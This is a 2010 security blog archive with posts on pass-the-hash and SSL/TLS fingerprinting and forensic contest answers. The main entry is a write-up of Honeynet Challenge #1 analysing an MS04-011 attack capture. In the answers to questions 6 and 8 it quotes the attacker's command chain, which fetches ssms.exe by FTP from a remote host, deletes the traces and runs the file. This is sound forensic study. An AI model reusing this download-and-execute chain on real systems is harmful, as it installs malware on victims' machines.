Thursday, February 25, 2010

Pass the Hash

While I normally post info on here about fingerprinting, I also like looking at anything that "gives away too much info". I've known about the pass the hash technique for quite awhile now, never paid it much attention until I watch a demo on how effective it can be.

Anyway, nice paper on how it works, some of the tools to do it and some mitigation options from what I've read so far. Need to do more than scan it, but give it a check.

Wednesday, February 17, 2010

SSL/TLS Fingerprinting

I've been following Thierry Zoller off and on for years now, probably helped that he was one of the first people to find and mention Satori back in the day.

He's come up with a new tool that fingerprints SSL/TLS connections called SSL/TLS Audit. Actually, it is a tool that does SSL/TLS Auditing, just happens to have a feature that in turn fingerprints the ssl engine.

"Apart from scanning available ciphersuites it has an interesting tidbit : The Fingerprint mode (Experimental). Included is an experimental fingerprint engine that tries to determine the SSL Engine used server side. It does so by sending normal and malformed SSL packets that can be interpreted in different ways.

SSL Audit is able to fingerprint :
· IIS7.5 (Schannel)
· IIS7.0 (Schannel)
· IIS 6.0 (Schannel)
· Apache (Openssl)
· Apache (NSS)
· Certicom
· RSA BSAFE "

They have an upcoming paper due out it looks like, so it will be interesting to see what information they provide. Gives me some ideas, so depending on time in the near future I may have to look into this a bit more.

Sunday, February 14, 2010

Honeynet Challenge #1 Results

Well I didn't do as well as I'd hoped on Challenge #1, only got a 25 out of 40 on score, ranking me 28 out of the 91 submissions. Top third, but not as high as I would have liked.

Here were my score results:
Answer 1: 2 points (of 2)
Answer 2: 1.5 points (of 2)
Answer 3: 2 points (of 2)
Answer 4: 1.5 points (of 2)
Answer 5: 4 points (of 6)
Answer 6: 3 points (of 6)
Answer 7: 2 points (of 2)
Answer 8: 1 points (of 8)
Answer 9: 4 points (of 6)
Answer 10: 2 points (of 2)
Answer 11: 2 points (of 2)

Looks like I blew the shell code section along with the general overview! A bit off here/there other than that too, but those were the worst sections.

Here were the questions again:
1. Which systems (i.e. IP addresses) are involved? (2pts)
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
3. How many TCP sessions are contained in the dump file? (2pts)
4. How long did it take to perform the attack? (2pts)
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
7. What specific vulnerability was attacked? (2pts)
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
11. Do you think this is a manual or an automated attack? Why? (2pts)

Anyway, very fun exercise, glad they put it on and they are posting the results earlier than I thought they would, didn't expect anything until tomorrow.

Looks like they are planning another one in the near future. Not sure it is something I'll work on, but keep your eyes on their site if you are interested!

Thursday, February 4, 2010

Forensic Contest #4 released

More information at their site, but here is what they are asking you to find.

1. What was the IP address of Mr. X’s scanner?
2. What type of port scan(s) did Mr. X conduct? Check all that apply:

* TCP SYN
* TCP ACK
* UDP
* TCP Connect
* TCP XMAS
* TCP RST

3. What were the IP addresses of the targets Mr. X discovered?
4. What was the MAC address of the Apple system he found?
5. What was the IP address of the Windows system he found?
6. What TCP ports were open on the Windows system? (Please list the decimal numbers from lowest to highest.)
X-TRA CREDIT (You don’t have to answer this, but you get super bonus points if you do): What was the name of the tool Mr. X used to port scan? How can you tell? Can you reconstruct the output from the tool, roughly the way Mr. X would have seen it?

Deadline is 3/04/10 (11:59:59PM UTC-11) (In other words, if it’s still 3/04/10 anywhere in the world, you can submit your entry.)

Tuesday, February 2, 2010

Forensics Contest #3 - Answers

Ok, not going to do a writeup on this one. NetworkMiner was able to pull all the info out without much work. Thankfully it puts tcp packets back together and reconstructs the .xml files in question. Hopefully someone out there was able to come up with a new script to pull all the info they wanted, but it wasn't me, that is for sure!

My answers were:
1. 002500FE07C4
2. AppleTV/2.4
3. h, ha, hac, hack
4. Hackers
5. http://a227.v.phobos.apple.com/us/r1000/008/Video/62/bd/1b/mzm.plqacyqb..640x278.h264lc.d2.p.m4v
6. Sneakers
7. $9.99
8. iknowyourewatchingme

Honeynet Challenge #1 - Answers

The deadline was yesterday, so I think I'm ok posting my answers. Not sure if these are correct or not, but this is what I submitted. If anyone has any questions let me know. Again, this was a fun exercise:

Question 1. Which systems (i.e. IP addresses) are involved?

Tools Used: Satori, NetworkMiner, and Wireshark
192.150.11.111 – End system
98.114.205.102 - Attacker

-----

Question 2. What can you find out about the attacking host (e.g., where is it located)?

Tools Used: WHOIS, Wireshark

TTL – 113, since appears to be a windows box, 15 hops away.

According to: http://www.ipaddresslocation.org/ip-address-locator.php

They are most likely located in/around Southampton Pennsylvania, which is where the local Verizon Internet Services office is located at least.

Attack System appears to be a Windows 2000 system (TTL puts it as Windows (typically) and TCP fingerprint put it as a Windows 2000, XP or 2003 box and SMB puts it as Windows 2000 and SMB is the most reliable of those mentioned normally).

-----

Question 3. How many TCP sessions are contained in the dump file?

Tools Used: NetworkMiner, verified with Wireshark

5 total:
- 4 from 98.114.205.102
- 1 from 192.150.11.111

-----

Question 4. How long did it take to perform the attack?

Tools Used: wireshark Awarded Points:

It depends on what part you consider the actual attack:

Max of 16.2 seconds from the first packet to the last packet in the capture. Most of the time is actually FTP’ing a file.

Within the first 2 seconds the Buffer Overflow has already taken place. The next 14 seconds are sending the command to the system and FTP’ing the file.

-----

Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?

Tools Used: Satori, wireshark

192.150.11.111

2 competing fingerprints:

* Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel.
* SMB packets on the otherhand claim it is on the VIDCAM Domain and running Windows 5.1 (packet 16 & 19)

Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; Trying to exploit MS04-011, targeting the Windows LSA Service.

-----

Question 6. Can you sketch an overview of the general actions performed by the attacker?

Tools Used: wireshark

Authenticates as a null user to ipc$, peforms a DsRoleUpgradeDownlevelServer Buffer Overflow. Once exploited forces the system to FTP a file.

First they dump these commands in the file ‘o’:

open 0.0.0.0 8884

user 1 1

get ssms.exe

Then they do:

ftp –n –s:o (Suppresses auto-login and reads data in from the ‘o’ file)

Delete the ‘o’ file to make sure nobody can see what they did, forcing it quite mode and deleting of read only files, just in case.

Then launch ssms.exe

-----

Question 7. What specific vulnerability was attacked?

MS04-011, good writeup at:

http://research.eeye.com/html/advisories/published/AD20040413C.html

-----

Question 8. What actions does the shellcode perform? Pls list the shellcode

Tools Used: wireshark, trace tcp conversation

It targets DSRoleUpgradeDownLevelServer, does a buffer overflow of a lot of 0x31, or 1’s in ascii. As soon as that is done it starts a new TCP conversation and does this (more info back in question #6)

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe

ssms.exe

It appears to call ssms.exe twice, not sure if that is by design or due to a bug???

-----

Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?

Tools Used: Satori (http://myweb.cableone.net/xnih)

Yes. Go back to #5. TCP fingerprint shows the box as Linux 2.6, SMB shows the box as Windows XP. The TTL can be tweaked on windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that can be done that may allow this.

-----

Question 10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge)

Smss.exe, may be W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say. That is just a guess based on the name and the name alone.

-----

Question 11. Do you think this is a manual or an automated attack? Why?

Automated, it only took 16 seconds from start to finish. Typing this sentence up took that long with a few typo’s! Not to mention, most of that 16.2 seconds was downloading the ssms.exe file. So while it is possible someone sat there and did it, due to the quickness in which it took place it seems unlikely.